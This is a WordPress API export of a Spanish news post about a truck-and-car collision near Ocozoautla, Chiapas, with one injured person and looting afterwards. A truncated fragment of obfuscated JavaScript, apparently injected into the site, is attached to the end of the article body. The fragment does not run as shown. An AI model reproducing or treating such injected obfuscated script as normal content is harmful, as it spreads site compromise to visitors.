{"id":8263,"date":"2023-01-25T01:23:23","date_gmt":"2023-01-25T01:23:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8263"},"modified":"2023-01-25T01:23:25","modified_gmt":"2023-01-25T01:23:25","slug":"fuerte-accidente-de-transito-en-el-tramo-tuxtla-cintalapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8263","title":{"rendered":"Fuerte accidente de tr\u00e1nsito en el tramo Tuxtla-Cintalapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674609591500.jpg\" alt=\"\" class=\"wp-image-8264\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674609591500.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674609591500-225x300.jpg 225w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana se registr\u00f3 un fuerte accidente en el tramo carretero Tuxtla-Cintalapa, a la altura del Cerro Meyapac, en el municipio de Ocozoautla, d\u00f3nde un pesado cami\u00f3n y una unidad particular colisionaron.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, la unidad particular perdi\u00f3 el control y se impact\u00f3 contra el tr\u00e1iler que transportaba abarrotes.<\/p>\n\n\n\n<p>Por el impacto el veh\u00edculo particular termin\u00f3 volcando y se reporta un lesionado.<\/p>\n\n\n\n<p>Las corporaciones de auxilio trabajan en el lugar de los hechos.<\/p>\n\n\n\n<p>Lamentablemente la rapi\u00f1a no se hizo esperar<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana se registr\u00f3 un fuerte accidente en el tramo carretero Tuxtla-Cintalapa, a la altura del Cerro Meyapac, en el municipio de Ocozoautla, d\u00f3nde un pesado cami\u00f3n y una unidad particular colisionaron. De acuerdo con los primeros reportes, la unidad particular &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8264,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8263","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8263"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8263\/revisions"}],"predecessor-version":[{"id":8265,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8263\/revisions\/8265"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8264"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}